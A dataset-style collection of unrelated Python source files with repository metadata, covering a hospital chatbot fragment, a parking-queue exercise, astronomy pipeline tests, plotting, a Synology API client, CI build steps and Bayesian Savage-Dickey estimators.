slot_dictionary['disease'] +
"是屬於哪一科,以下為相關科別:")
for data in collection_disease.find({"disease_c": {"$regex": slot_dictionary['disease']}}):
print(", ".join(data['department']))
elif intent_index == 3: # search_doctor
print("好的,您想查詢" +
slot_dictionary['division'] + slot_dictionary['disease'] +
"有哪些醫生可以掛號,以下為醫生表列:")
for data in collection_division.find({"$and": [{"disease": {"$regex": slot_dictionary['disease']}},
{"department": {"$regex": slot_dictionary['division']}}]}):
print(data['department'] + " 醫師: " + ", ".join(data['doctor']))
elif intent_index == 4: # search_timetable
print("好的,您想查詢" + slot_dictionary['division'] +
slot_dictionary['disease'] + slot_dictionary['doctor'] + slot_dictionary['time'] + "的門診時間")
elif intent_index == 5: # register
print("好的,幫您預約掛號" + " " + slot_dictionary['division'] + " " +
slot_dictionary['disease'] + " " + slot_dictionary['doctor'] + " " +
slot_dictionary['time'] + "的門診")
else:
print("不好意思,我不確定您的意思")
if __name__ == '__main__':
main()
| 42.835821
| 117
| 0.558537
|
ce61c016bd3af7f43a31a0bab4fe1abfc80da463
| 2,991
|
py
|
Python
|
Aula 7 - Fila/exercicio_sobre_fila_nota/filaCarro.py
|
EnedinoAndre/Estrutura-De-Dados-em-Python
|
877c9f5c9fa703cc591a25070cd7ec8baa00476d
|
[
"MIT"
] | null | null | null |
Aula 7 - Fila/exercicio_sobre_fila_nota/filaCarro.py
|
EnedinoAndre/Estrutura-De-Dados-em-Python
|
877c9f5c9fa703cc591a25070cd7ec8baa00476d
|
[
"MIT"
] | null | null | null |
Aula 7 - Fila/exercicio_sobre_fila_nota/filaCarro.py
|
EnedinoAndre/Estrutura-De-Dados-em-Python
|
877c9f5c9fa703cc591a25070cd7ec8baa00476d
|
[
"MIT"
] | null | null | null |
class Estacionamento():
#CONSTRUTOR
def __init__(self):
self.estacionamento = []
#ADICIONAR
def adicionarCarro(self, carro):
self.estacionamento.append(carro)
#TIRAR DA FILA
def retirar(self,placa):
placaBoolean = False
for i in self.estacionamento:
if i == placa:
pos = self.estacionamento.index(placa)
for i in range(0,pos + 1):
self.adicionarCarro(self.estacionamento[0])
self.estacionamento.pop(0)
self.estacionamento.pop()
placaBoolean = True
return placaBoolean
#MOSTRAR
def mostrarEstacionamento(self):
return self.estacionamento
#EXECUTAR
def main():
#OBJETO
estacionamento_1 = Estacionamento()
contador = 0
while contador == 0:
try:
print("------- QUAL OPERAÇÃO DESEJA REALIZAR? --------")
operacao = input("A - ADICIONAR CARRO NO ESTACIONAMENTO: \n"
"R - RETIRAR CARRO DO ESTACIONAMENTO: \n"
"S - MOSTRAR SITUAÇÃO DO ESTACIONAMENTO: \n"
"X - SAIR: ")
#ADICIONAR
if operacao.upper() == 'A':
print("---------------- ADICIONAR -----------------")
estacionamento_1.adicionarCarro(input("PLACA DO CARRO: "))
print("--------------------------------------------")
#RETIRAR
elif operacao.upper() == 'R':
print("----------------- RETIRAR ------------------")
placa = input("DIGITE A PLACA DO CARRO: ")
situacaoPlaca = estacionamento_1.retirar(placa)
if situacaoPlaca == False:
print("O CARRO NÃO ESTÁ ESTACIONADO")
elif situacaoPlaca == True:
print("O CARRO SAIU DO ESTACIONAMENTO")
print("--------------------------------------------")
#MOSTRAR ESTACIONAMENTO
elif operacao.upper() == 'S':
print("------------- ESTACIONAMENTO ---------------")
situacao = estacionamento_1.mostrarEstacionamento()
#VALIDAÇÃO DE ESTACIONAMENTO
if situacao == []:
print("Estacionamento Está Vazio")
else:
for i in range(len(situacao)):
print(i+1,"º Carro:",situacao[i])
print("--------------------------------------------")
#SAIR DO MENU
elif operacao.upper() == 'X':
print("----------------- OBRIGADO !!! ------------------")
contador = 1
#ERRO DE OPÇÃO
else:
print("------------ DIGITE UMA OPÇÃO CERTA --------------")
#ERRO DE VALOR
except ValueError:
print("DIGITE UMA OPCÃO CORRETA")
main()
| 33.606742
| 76
| 0.439652
|
092d02390a5e1e6226277aec116588c5b84a96c8
| 2,734
|
py
|
Python
|
test/integration/tests/model_mapper/link_variable_to_constant_floats.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
test/integration/tests/model_mapper/link_variable_to_constant_floats.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
test/integration/tests/model_mapper/link_variable_to_constant_floats.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
import os
import shutil
from autofit import conf
from autofit.optimize import non_linear as nl
from autolens.data import ccd
from autolens.model.galaxy import galaxy, galaxy_model as gm
from autolens.pipeline import phase as ph
from autolens.pipeline import pipeline as pl
from autolens.model.profiles import light_profiles as lp
from test.integration import tools
test_type = 'model_mapper'
test_name = "link_variable_to_constant_floats"
path = '{}/../../'.format(os.path.dirname(os.path.realpath(__file__)))
output_path = path+'output/'+test_type
config_path = path+'config'
conf.instance = conf.Config(config_path=config_path, output_path=output_path)
def pipeline():
sersic = lp.EllipticalSersic(centre=(0.0, 0.0), axis_ratio=0.8, phi=90.0, intensity=1.0, effective_radius=1.3,
sersic_index=3.0)
lens_galaxy = galaxy.Galaxy(light_profile=sersic)
tools.reset_paths(test_name=test_name, output_path=output_path)
tools.simulate_integration_image(test_name=test_name, pixel_scale=0.1, lens_galaxies=[lens_galaxy],
source_galaxies=[], target_signal_to_noise=30.0)
ccd_data = ccd.load_ccd_data_from_fits(image_path=path + '/data/' + test_name + '/image.fits',
psf_path=path + '/data/' + test_name + '/psf.fits',
noise_map_path=path + '/data/' + test_name + '/noise_map.fits',
pixel_scale=0.1)
pipeline = make_pipeline(test_name=test_name)
pipeline.run(data=ccd_data)
def make_pipeline(test_name):
class MMPhase(ph.LensPlanePhase):
def pass_priors(self, previous_results):
self.lens_galaxies.lens.light.axis_ratio = 0.2
self.lens_galaxies.lens.light.phi = 90.0
phase1 = MMPhase(lens_galaxies=dict(lens=gm.GalaxyModel(light=lp.EllipticalSersic)),
optimizer_class=nl.MultiNest, phase_name="{}/phase1".format(test_name))
phase1.optimizer.const_efficiency_mode = True
phase1.optimizer.n_live_points = 20
phase1.optimizer.sampling_efficiency = 0.8
class MMPhase2(ph.LensPlanePhase):
def pass_priors(self, previous_results):
self.lens_galaxies.lens = previous_results[0].constant.lens
phase2 = MMPhase2(lens_galaxies=dict(lens=gm.GalaxyModel(light=lp.EllipticalSersic)),
optimizer_class=nl.MultiNest, phase_name="{}/phase2".format(test_name))
phase2.optimizer.const_efficiency_mode = True
phase2.optimizer.n_live_points = 20
phase2.optimizer.sampling_efficiency = 0.8
return pl.PipelineImaging(test_name, phase1, phase2)
if __name__ == "__main__":
pipeline()
| 36.945946
| 114
| 0.691295
|
9a6bd509a5d8a88dad874aebe9990c22fb9cce35
| 3,339
|
py
|
Python
|
Advanced_ML/Deep_Learning/plots.py
|
jrclimer/Projects
|
6023f8309685d1a273d7e89993863c89ad85dfb5
|
[
"MIT"
] | 27
|
2016-11-18T11:15:58.000Z
|
2021-02-26T05:46:37.000Z
|
Advanced_ML/Deep_Learning/plots.py
|
imsrgadich/Projects_shang
|
a9d4395a98a79fb0a700a99168cd358ab7494fdf
|
[
"MIT"
] | 1
|
2022-01-21T16:09:40.000Z
|
2022-01-21T16:30:10.000Z
|
Advanced_ML/Deep_Learning/plots.py
|
imsrgadich/Projects_shang
|
a9d4395a98a79fb0a700a99168cd358ab7494fdf
|
[
"MIT"
] | 22
|
2016-11-27T06:02:26.000Z
|
2021-09-22T13:40:55.000Z
|
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
try:
import cPickle as pickle
except:
import pickle
with open("batch_norm_accuracy.p","rb") as f:
batch_norm_accuracy = pickle.load(f)
with open("rbm_pretraining_accuracy.p","rb") as f:
rbm_pretraining_accuracy = pickle.load(f)
with open("grad_desc_2_accuracy.p","rb") as f:
grad_desc_2_accuracy = pickle.load(f)
with open("grad_desc_4_accuracy.p","rb") as f:
grad_desc_4_accuracy = pickle.load(f)
with open("res_grad_desc_accuracy.p","rb") as f:
res_grad_desc_accuracy = pickle.load(f)
with open("res_batch_norm_accuracy.p","rb") as f:
res_batch_norm_accuracy = pickle.load(f)
fig = plt.figure(figsize=(12, 8))
ax1 = fig.add_subplot(111)
ax1.scatter(range(len(batch_norm_accuracy)),batch_norm_accuracy,alpha=0.5,s=2,c='b',edgecolor='')
ax1.scatter(range(len(rbm_pretraining_accuracy)),rbm_pretraining_accuracy,alpha=0.5,s=2,c='r',edgecolor='')
ax1.scatter(range(len(grad_desc_2_accuracy)),grad_desc_2_accuracy,alpha=0.5,s=2,c='c',edgecolor='')
ax1.scatter(range(len(grad_desc_4_accuracy)),grad_desc_4_accuracy,alpha=0.5,s=2,c='g',edgecolor='')
ax1.scatter(range(len(res_grad_desc_accuracy)),res_grad_desc_accuracy,alpha=0.5,s=2,c='m',edgecolor='')
ax1.scatter(range(len(res_batch_norm_accuracy)),res_batch_norm_accuracy,alpha=0.5,s=2,c='darkorange',edgecolor='')
s1 = mpatches.Patch(color='b', label='batch normalization')
s2 = mpatches.Patch(color='r', label='rbm pre-training')
s3 = mpatches.Patch(color='c', label='2-layer gradient descent')
s4 = mpatches.Patch(color='g', label='4-layer gradient descent')
s5 = mpatches.Patch(color='m', label='residual gradient descent')
s6 = mpatches.Patch(color='darkorange', label='residual batch norm')
plt.legend(handles=[s3,s4,s1,s5,s6,s2],loc='upper right')
plt.title("Test Set Accuracy")
plt.xlabel('Iteration')
plt.ylabel('Test Set Error')
plt.xlim(-100, 3000)
plt.savefig('test_accuracy_1.png')
plt.show()
fig = plt.figure(figsize=(12, 8))
ax1 = fig.add_subplot(111)
ax1.scatter(range(len(batch_norm_accuracy))[200:],batch_norm_accuracy[200:],alpha=0.5,s=2,c='b',edgecolor='')
ax1.scatter(range(len(rbm_pretraining_accuracy))[200:],rbm_pretraining_accuracy[200:],alpha=0.5,s=2,c='r',edgecolor='')
ax1.scatter(range(len(grad_desc_2_accuracy))[200:],grad_desc_2_accuracy[200:],alpha=0.5,s=2,c='c',edgecolor='')
ax1.scatter(range(len(grad_desc_4_accuracy))[200:],grad_desc_4_accuracy[200:],alpha=0.5,s=2,c='g',edgecolor='')
ax1.scatter(range(len(res_grad_desc_accuracy))[200:],res_grad_desc_accuracy[200:],alpha=0.5,s=2,c='m',edgecolor='')
ax1.scatter(range(len(res_batch_norm_accuracy))[200:],res_batch_norm_accuracy[200:],alpha=0.5,s=2,c='darkorange',edgecolor='')
s1 = mpatches.Patch(color='b', label='batch normalization')
s2 = mpatches.Patch(color='r', label='rbm pre-training')
s3 = mpatches.Patch(color='c', label='2-layer gradient descent')
s4 = mpatches.Patch(color='g', label='4-layer gradient descent')
s5 = mpatches.Patch(color='m', label='residual gradient descent')
s6 = mpatches.Patch(color='darkorange', label='residual batch norm')
plt.legend(handles=[s3,s4,s1,s5,s6,s2],loc='upper right')
plt.title("Test Set Accuracy (Zoomed)")
plt.xlabel('Iteration')
plt.ylabel('Test Set Error')
plt.xlim(200, 3000)
plt.savefig('test_accuracy_2.png')
plt.show()
| 45.121622
| 126
| 0.743336
|
36bebff1809a3d17ac207d96410e0907e74c07d8
| 7,616
|
py
|
Python
|
synopy/base.py
|
gspanos/synopy
|
c99680308eb929bdef5d38eb100cd48e0403b705
|
[
"MIT"
] | 14
|
2015-07-17T03:52:22.000Z
|
2021-04-22T10:56:41.000Z
|
synopy/base.py
|
tipok/synopy
|
276202e4f315577088df2abd5cc239a29620f570
|
[
"MIT"
] | 1
|
2019-09-10T11:13:38.000Z
|
2019-10-06T15:06:20.000Z
|
synopy/base.py
|
tipok/synopy
|
276202e4f315577088df2abd5cc239a29620f570
|
[
"MIT"
] | 14
|
2015-07-23T15:09:39.000Z
|
2021-12-12T09:04:11.000Z
|
# -*- coding: utf-8 -*-
import json
try:
from urlparse import urljoin
except ModuleNotFoundError:
from urllib.parse import urljoin
import six
import requests
from .errors import format_error
WEBAPI_PREFIX = 'webapi'
class Authentication(object):
def __init__(self, sid, format='cookie'):
assert format in ('cookie', 'sid'), "invalid sid format"
self.sid = sid
self.format = format
def build_params(self):
auth = {}
sid_key = self.format == 'cookie' and 'id' or '_id'
auth[sid_key] = self.sid
return auth
class Connection(object):
def __init__(self, protocol, domain, auth=None, port=80, verify=True):
assert protocol in ('http', 'https'), "invalid protocol"
assert int(port), "port number must be integer"
self.protocol = protocol
self.domain = domain
self.auth = auth
self.port = str(port)
self.verify = verify
def build_url(self, path):
base_path = u'://'.join([self.protocol, self.domain])
base_path = u':'.join([base_path, self.port])
return urljoin(base_path, path)
def build_request_options(self, http_method, params):
opts = {'params' if http_method == 'get' else 'data': params}
if self.auth:
# if we have credentials, then use them.
auth_params = self.auth.build_params()
if self.auth.format == 'sid':
# pass the sid along with the get params
opts['params'].update(auth_params)
else:
# pass it as a cookie
opts['cookies'] = auth_params
opts['verify'] = self.verify
return opts
def send(self, path, http_method, namespace, params, caller=None):
api_method = params['method']
http_method = http_method.lower()
assert http_method in ('get', 'post'), "invalid http method"
url = self.build_url(path)
opts = self.build_request_options(http_method, params)
if http_method == 'get':
resp = requests.get(url, **opts)
else:
resp = requests.post(url, **opts)
response = self.handle_response(resp, namespace)
if caller and caller.has_handler_for(api_method):
return caller.get_handler_for(api_method)(response)
return response
def handle_response(self, resp, namespace):
response = Response(resp)
if response.status_code == 200:
if not response.is_success():
errno = response.error_code
response.error_message = format_error(errno, namespace)
return response
def authenticate(self, account, passwd):
path = u'/'.join([WEBAPI_PREFIX, 'auth.cgi'])
params = {
'method': 'login',
'account': account,
'passwd': passwd,
'version': 2,
'api': 'SYNO.API.Auth',
'format': 'sid',
'session': 'DownloadStation'
}
resp = self.send(path, 'GET', 'SYNO.API.Auth', params)
if resp.is_success():
sid = resp.cookies['id']
self.auth = Authentication(sid)
else:
raise ValueError(u"Wrong account name or password")
class Response(object):
def __init__(self, resp):
# the ``requests`` library response object
self.raw_response = resp
# response headers
self.headers = resp.headers
# response coolies
self.cookies = resp.cookies
# the http status code
self.status_code = resp.status_code
# the url that initiated this response
self.url = resp.url
# the deserialized json data
self.payload = resp.status_code == 200 and json.loads(
resp.content) or {}
# user friendly message
self.error_message = None
def is_success(self):
return self.payload.get('success') is True
@property
def error_code(self):
return self.payload.get('error') and self.payload['error']['code'] or None
def __str__(self):
return str(self.payload)
def _send_command(self, api_method, http_method, params):
all_params = self.base_params
all_params['method'] = api_method
all_params.update(params)
return self.conn.send(
self.path,
http_method,
self.namespace,
all_params,
caller=self
)
class ApiBaseMeta(type):
def __init__(cls, name, bases, attrs):
super(ApiBaseMeta, cls).__init__(name, bases, attrs)
parents = [b for b in bases if isinstance(b, ApiBaseMeta)]
if not parents:
return
api_methods = attrs.pop('methods')
if isinstance(api_methods, six.string_types):
api_methods = [api_methods]
for api_method in api_methods:
cls.add_api_method(api_method)
def add_api_method(cls, api_method):
def wrapped_send(_api_method_name, _http_method):
def _wrapped(self, **params):
return _send_command(self, _api_method_name, _http_method, params)
return _wrapped
if isinstance(api_method, six.string_types):
api_method_name, func_name, http_method = api_method, api_method, 'GET'
elif isinstance(api_method, (list, tuple)):
if len(api_method) == 3:
api_method_name, func_name, http_method = api_method
assert isinstance(
api_method_name, six.string_types), "Invalid API method name"
func_name = func_name or api_method
http_method = http_method or 'GET'
elif len(api_method) == 2:
api_method_name, func_name = api_method
assert isinstance(
api_method_name, six.string_types), "Invalid API method name"
func_name = func_name or api_method
http_method = 'GET'
elif len(api_method) == 1:
api_method_name = api_method[0]
assert isinstance(
api_method_name, six.string_types), "Invalid API method name"
func_name = api_method_name
http_method = 'GET'
else:
raise ValueError("Invalid API method definition: {} parameters!"
.format(len(api_method)))
else:
raise TypeError(
"Invalid API method type: {!r}".format(type(api_method)))
setattr(
cls,
func_name,
wrapped_send(api_method_name, http_method)
)
@six.add_metaclass(ApiBaseMeta)
class ApiBase(object):
path = None
namespace = None
methods = None
def __init__(self, connection, version, namespace_prefix=WEBAPI_PREFIX):
assert int(version), "version number must be integer"
self.conn = connection
self.version = str(version)
self.prefix = namespace_prefix or u''
self.path = u'/'.join([self.prefix, self.path])
self._handlers = {}
@property
def base_params(self):
return {
'api': self.namespace,
'version': self.version
}
def set_handler_for(self, api_method, handler):
self._handlers[api_method] = handler
def has_handler_for(self, api_method):
return api_method in self._handlers
def get_handler_for(self, api_method):
return self._handlers[api_method]
def remove_handler_for(self, api_method):
del self._handlers[api_method]
| 32.135021
| 83
| 0.59375
|
b0be3a99e96bd4840add000a3d6ff7467f3e2d70
| 4,570
|
py
|
Python
|
bindings/python/cconfigspace/evaluation.py
|
deephyper/CCS
|
dd8c976eca2a510c995862cc5c871e81932f3ff4
|
[
"BSD-3-Clause"
] | 1
|
2021-11-29T16:31:28.000Z
|
2021-11-29T16:31:28.000Z
|
bindings/python/cconfigspace/evaluation.py
|
deephyper/CCS
|
dd8c976eca2a510c995862cc5c871e81932f3ff4
|
[
"BSD-3-Clause"
] | 1
|
2021-12-15T10:37:41.000Z
|
2021-12-15T10:48:24.000Z
|
bindings/python/cconfigspace/evaluation.py
|
deephyper/CCS
|
dd8c976eca2a510c995862cc5c871e81932f3ff4
|
[
"BSD-3-Clause"
] | 2
|
2021-09-16T18:20:47.000Z
|
2021-12-07T17:54:11.000Z
|
import ctypes as ct
from .base import Object, Error, CEnumeration, ccs_error, ccs_result, _ccs_get_function, ccs_context, ccs_hyperparameter, ccs_configuration_space, ccs_configuration, ccs_datum, ccs_datum_fix, ccs_objective_space, ccs_evaluation
from .context import Context
from .hyperparameter import Hyperparameter
from .configuration_space import ConfigurationSpace
from .configuration import Configuration
from .objective_space import ObjectiveSpace
from .binding import Binding
class ccs_comparison(CEnumeration):
_members_ = [
('BETTER', -1),
('EQUIVALENT', 0),
('WORSE', 1),
('NOT_COMPARABLE', 2) ]
ccs_create_evaluation = _ccs_get_function("ccs_create_evaluation", [ccs_objective_space, ccs_configuration, ccs_result, ct.c_size_t, ct.POINTER(ccs_datum), ct.c_void_p, ct.POINTER(ccs_evaluation)])
ccs_evaluation_get_objective_space = _ccs_get_function("ccs_evaluation_get_objective_space", [ccs_evaluation, ct.POINTER(ccs_objective_space)])
ccs_evaluation_get_configuration = _ccs_get_function("ccs_evaluation_get_configuration", [ccs_evaluation, ct.POINTER(ccs_configuration)])
ccs_evaluation_get_error = _ccs_get_function("ccs_evaluation_get_error", [ccs_evaluation, ct.POINTER(ccs_result)])
ccs_evaluation_set_error = _ccs_get_function("ccs_evaluation_set_error", [ccs_evaluation, ccs_result])
ccs_evaluation_get_objective_value = _ccs_get_function("ccs_evaluation_get_objective_value", [ccs_evaluation, ct.c_size_t, ct.POINTER(ccs_datum)])
ccs_evaluation_get_objective_values = _ccs_get_function("ccs_evaluation_get_objective_values", [ccs_evaluation, ct.c_size_t, ct.POINTER(ccs_datum), ct.POINTER(ct.c_size_t)])
ccs_evaluation_compare = _ccs_get_function("ccs_evaluation_compare", [ccs_evaluation, ccs_evaluation, ct.POINTER(ccs_comparison)])
ccs_evaluation_check = _ccs_get_function("ccs_evaluation_check", [ccs_evaluation])
class Evaluation(Binding):
def __init__(self, handle = None, retain = False, auto_release = True,
objective_space = None, configuration = None, error = ccs_error.SUCCESS, values = None, user_data = None):
if handle is None:
count = 0
if values:
count = len(values)
vals = (ccs_datum * count)()
for i in range(count):
vals[i].value = values[i]
else:
vals = None
handle = ccs_evaluation()
res = ccs_create_evaluation(objective_space.handle, configuration.handle, error, count, vals, user_data, ct.byref(handle))
Error.check(res)
super().__init__(handle = handle, retain = False)
else:
super().__init__(handle = handle, retain = retain, auto_release = auto_release)
@classmethod
def from_handle(cls, handle, retain = True, auto_release = True):
return cls(handle = handle, retain = retain, auto_release = auto_release)
@property
def objective_space(self):
if hasattr(self, "_objective_space"):
return self._objective_space
v = ccs_objective_space()
res = ccs_evaluation_get_objective_space(self.handle, ct.byref(v))
Error.check(res)
self._objective_space = ObjectiveSpace.from_handle(v)
return self._objective_space
@property
def configuration(self):
if hasattr(self, "_configuration"):
return self._configuration
v = ccs_configuration()
res = ccs_evaluation_get_configuration(self.handle, ct.byref(v))
Error.check(res)
self._configuration = Configuration.from_handle(v)
return self._configuration
@property
def error(self):
v = ccs_result()
res = ccs_evaluation_get_error(self.handle, ct.byref(v))
Error.check(res)
return v.value
@error.setter
def error(self, v):
res = ccs_evaluation_set_error(self.handle, v)
Error.check(res)
@property
def num_objective_values(self):
if hasattr(self, "_num_objective_values"):
return self._num_objective_values
v = ct.c_size_t()
res = ccs_evaluation_get_objective_values(self.handle, 0, None, ct.byref(v))
Error.check(res)
self._num_objective_values = v.value
return self._num_objective_values
@property
def objective_values(self):
sz = self.num_objective_values
if sz == 0:
return []
v = (ccs_datum * sz)()
res = ccs_evaluation_get_objective_values(self.handle, sz, v, None)
Error.check(res)
return [x.value for x in v]
def compare(self, other):
v = ccs_comparison(0)
res = ccs_evaluation_compare(self.handle, other.handle, ct.byref(v))
Error.check(res)
return v.value
def check(self):
res = ccs_evaluation_check(self.handle)
Error.check(res)
| 41.171171
| 227
| 0.745295
|
8eae78bf00eb9187a73cad02db25fd6a44569cba
| 3,050
|
py
|
Python
|
mementoweb/validator/tests/link_header_timegate_test.py
|
lanl/memento-validator
|
1937fcbf98194af7d649438603466480683707f3
|
[
"BSD-3-Clause"
] | 2
|
2022-01-11T17:08:56.000Z
|
2022-02-21T15:01:00.000Z
|
mementoweb/validator/tests/link_header_timegate_test.py
|
lanl/memento-validator
|
1937fcbf98194af7d649438603466480683707f3
|
[
"BSD-3-Clause"
] | 1
|
2021-11-09T21:53:37.000Z
|
2021-11-09T21:53:37.000Z
|
mementoweb/validator/tests/link_header_timegate_test.py
|
lanl/memento-validator
|
1937fcbf98194af7d649438603466480683707f3
|
[
"BSD-3-Clause"
] | null | null | null |
#
# Copyright (c) 2021. Los Alamos National Laboratory (LANL).
# Written by: Bhanuka Mahanama (bhanuka@lanl.gov)
# Research and Prototyping Team, SRO-RL,
# Los Alamos National Laboratory
#
# Correspondence: Lyudmila Balakireva, PhD (ludab@lanl.gov)
# Research and Prototyping Team, SRO-RL,
# Los Alamos National Laboratory
#
# See LICENSE in the project root for license information.
#
import typing
from typing import List
from mementoweb.validator.util.http import HttpResponse
from mementoweb.validator.tests.link_header_test import LinkHeaderTest
from mementoweb.validator.tests.test import TestReport, TestResult
from mementoweb.validator.validator_types import ResourceType
class LinkHeaderTimeGateTestReport(TestReport):
time_gate_uris: List[str] = []
def __init__(self, time_gate_uris=None, *args, **kwargs):
super(LinkHeaderTimeGateTestReport, self).__init__(*args, **kwargs)
if time_gate_uris is None:
time_gate_uris = []
self.time_gate_uris = time_gate_uris
def to_json(self):
return_value = TestReport.to_json(self)
return_value['timegates'] = self.time_gate_uris
return return_value
class LinkHeaderTimeGateTest(LinkHeaderTest):
_description = "Tests for the compliance of Link header timegate relation."
TIMEGATE_PRESENT = "Timegate link present"
TIMEGATE_NOT_PRESENT = "Timegate link present"
_test_report: LinkHeaderTimeGateTestReport
def __init__(self):
super().__init__()
self._test_report = LinkHeaderTimeGateTestReport(
name=self._name(),
description=self._description,
report_status=TestReport.REPORT_FAIL,
tests=[],
time_gate_uris=[]
)
def test(self, response: HttpResponse, resource_type: ResourceType = ResourceType.ORIGINAL) -> \
LinkHeaderTimeGateTestReport:
# Just for typing support
return typing.cast(LinkHeaderTimeGateTestReport,
super(LinkHeaderTimeGateTest, self).test(response, resource_type))
def _test_original(self, response: HttpResponse) -> LinkHeaderTimeGateTestReport:
self._test_report.report_status = TestReport.REPORT_PASS
timegate_uris = response.search_link_headers("timegate")
if not len(timegate_uris):
self.add_test_result(TestResult(name=LinkHeaderTimeGateTest.TIMEGATE_NOT_PRESENT,
status=TestResult.TEST_FAIL))
self._test_report.report_status = TestReport.REPORT_FAIL
else:
self.add_test_result(TestResult(name=LinkHeaderTimeGateTest.TIMEGATE_PRESENT, status=TestResult.TEST_PASS))
self._test_report.time_gate_uris = [timegate_uri.uri for timegate_uri in timegate_uris]
return self._test_report
def _test_memento(self, response: HttpResponse) -> LinkHeaderTimeGateTestReport:
return self._test_original(response)
| 37.654321
| 119
| 0.697049
|
cc969a9a260956094fc97b518a86e2bbb3160e70
| 3,094
|
py
|
Python
|
.buildkite/dagster-buildkite/dagster_buildkite/steps/integration.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
.buildkite/dagster-buildkite/dagster_buildkite/steps/integration.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
.buildkite/dagster-buildkite/dagster_buildkite/steps/integration.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
import os
from ..defines import GCP_CREDS_LOCAL_FILE
from ..module_build_spec import ModuleBuildSpec
from ..utils import connect_sibling_docker_container, network_buildkite_container
from .test_images import publish_test_images, test_image_depends_fn
SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__))
def integration_suite_extra_cmds_fn(version):
return [
'export AIRFLOW_HOME="/airflow"',
"mkdir -p $${AIRFLOW_HOME}",
"export DAGSTER_DOCKER_IMAGE_TAG=$${BUILDKITE_BUILD_ID}-" + version,
'export DAGSTER_DOCKER_REPOSITORY="$${AWS_ACCOUNT_ID}.dkr.ecr.us-west-2.amazonaws.com"',
"aws ecr get-login --no-include-email --region us-west-2 | sh",
r"aws s3 cp s3://\${BUILDKITE_SECRETS_BUCKET}/gcp-key-elementl-dev.json "
+ GCP_CREDS_LOCAL_FILE,
"export GOOGLE_APPLICATION_CREDENTIALS=" + GCP_CREDS_LOCAL_FILE,
"pushd python_modules/libraries/dagster-celery",
# Run the rabbitmq db. We are in docker running docker
# so this will be a sibling container.
"docker-compose up -d --remove-orphans", # clean up in hooks/pre-exit,
# Can't use host networking on buildkite and communicate via localhost
# between these sibling containers, so pass along the ip.
network_buildkite_container("rabbitmq"),
connect_sibling_docker_container("rabbitmq", "test-rabbitmq", "DAGSTER_CELERY_BROKER_HOST"),
"popd",
]
def integration_steps():
tests = []
tests += publish_test_images()
tests += ModuleBuildSpec(
os.path.join("integration_tests", "python_modules", "dagster-k8s-test-infra"),
upload_coverage=True,
).get_tox_build_steps()
integration_suites_root = os.path.join(
SCRIPT_PATH, "..", "..", "..", "..", "integration_tests", "test_suites"
)
integration_suites = [
os.path.join("integration_tests", "test_suites", suite)
for suite in os.listdir(integration_suites_root)
]
for integration_suite in integration_suites:
tox_env_suffixes = None
if integration_suite == os.path.join(
"integration_tests", "test_suites", "k8s-integration-test-suite"
):
tox_env_suffixes = ["-default", "-markscheduler"]
elif integration_suite == os.path.join(
"integration_tests", "test_suites", "celery-k8s-integration-test-suite"
):
tox_env_suffixes = ["-default", "-markusercodedeployment", "-markdaemon"]
tests += ModuleBuildSpec(
integration_suite,
env_vars=[
"AIRFLOW_HOME",
"AWS_ACCOUNT_ID",
"AWS_ACCESS_KEY_ID",
"AWS_SECRET_ACCESS_KEY",
"BUILDKITE_SECRETS_BUCKET",
"GOOGLE_APPLICATION_CREDENTIALS",
],
upload_coverage=True,
extra_cmds_fn=integration_suite_extra_cmds_fn,
depends_on_fn=test_image_depends_fn,
tox_env_suffixes=tox_env_suffixes,
retries=2,
).get_tox_build_steps()
return tests
| 40.181818
| 100
| 0.655785
|
04ed5e15ad151bf2f904f155a257774efbc8bcad
| 2,213
|
py
|
Python
|
scripts/savagedickey.py
|
hallav/LuxUS-HS
|
12c0f0590fb40b2674feb5e8a1ccc1b6f0905b8c
|
[
"MIT"
] | 2
|
2020-06-26T16:33:04.000Z
|
2021-10-17T10:39:39.000Z
|
scripts/savagedickey.py
|
hallav/LuxUS-HS
|
12c0f0590fb40b2674feb5e8a1ccc1b6f0905b8c
|
[
"MIT"
] | null | null | null |
scripts/savagedickey.py
|
hallav/LuxUS-HS
|
12c0f0590fb40b2674feb5e8a1ccc1b6f0905b8c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import numpy
import scipy.stats
#The Savage-Dickey estimator computation is based on the implementation by Äijö et al. (2016) available at https://github.com/tare/LuxGLM (MIT lisence)
def calculate_savagedickey(prior1_mean,prior1_cov,prior2_mean,prior2_cov,samples1,samples2):
samples1_mean = numpy.mean(samples1,0)
samples1_cov = numpy.cov(samples1,rowvar=0)
samples2_mean = numpy.mean(samples2,0)
samples2_cov = numpy.cov(samples2,rowvar=0)
numerator = scipy.stats.multivariate_normal.pdf(numpy.zeros(prior1_mean.shape),mean=prior1_mean-prior2_mean,cov=prior1_cov+prior2_cov)
denominator = scipy.stats.multivariate_normal.pdf(numpy.zeros(prior1_mean.shape),mean=samples1_mean-samples2_mean,cov=samples1_cov+samples2_cov)
return numerator/denominator
def calculate_savagedickey_kde(prior1_mean,prior1_cov,prior2_mean,prior2_cov,samples1,samples2):
Delta = samples1-samples2
density = scipy.stats.kde.gaussian_kde(Delta,bw_method='scott')
numerator = scipy.stats.multivariate_normal.pdf(numpy.zeros(prior1_mean.shape),mean=prior1_mean-prior2_mean,cov=prior1_cov+prior2_cov)
denominator = density.evaluate([0])[0]
return numerator/denominator
def calculate_savagedickey_kde_1d(prior_mean,prior_cov,samples):
density = scipy.stats.kde.gaussian_kde(samples.T,bw_method='scott')
numerator = scipy.stats.multivariate_normal.pdf(numpy.zeros(prior_mean.shape),mean=prior_mean,cov=prior_cov)
denominator = density.evaluate([0,0])[0]
return numerator/denominator
def calculate_savagedickey_kde_window(prior1_mean,prior1_cov,prior2_mean,prior2_cov,samples1,samples2):
